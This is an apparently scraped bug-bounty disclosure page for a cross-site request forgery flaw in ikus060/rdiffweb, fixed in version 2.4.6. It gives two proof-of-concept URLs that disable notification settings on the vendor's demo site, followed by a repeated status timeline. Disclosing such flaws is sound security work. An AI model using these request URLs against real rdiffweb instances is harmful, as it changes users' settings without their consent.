CSRF leads to disabling notifications in users profile in ikus060/rdiffweb

Valid

Reported on

Sep 16th 2022

Description

https://rdiffweb-demo.ikus-soft.com/prefs/notification?repo1%2FC=0&repo2=0&repo3=0&action=set_notification_info

https://rdiffweb-demo.ikus-soft.com/prefs/notification?MyWindowsLaptop%2FC=0&test-encoding=0&testcases=0&action=set_notification_info

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a year ago

Patrik Dufresne validated this vulnerability a year ago

Ambadi MP has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented a year ago

Maintainer

@admin could to assign a CVE to this repport

commented a year ago

Admin

Done :)

We have sent a fix follow up to the ikus060/rdiffweb team. We will try again in 7 days. a year ago

Patrik Dufresne marked this as fixed in 2.4.6 with commit 18a5aa a year ago

This vulnerability will not receive a CVE

to join this conversation

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. a year ago

Patrik Dufresne validated this vulnerability a year ago

Ambadi MP has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented a year ago

Maintainer

@admin could to assign a CVE to this repport

commented a year ago

Admin

Done :)

We have sent a fix follow up to the ikus060/rdiffweb team. We will try again in 7 days. a year ago

Patrik Dufresne marked this as fixed in 2.4.6 with commit 18a5aa a year ago

This vulnerability will not receive a CVE

to join this conversation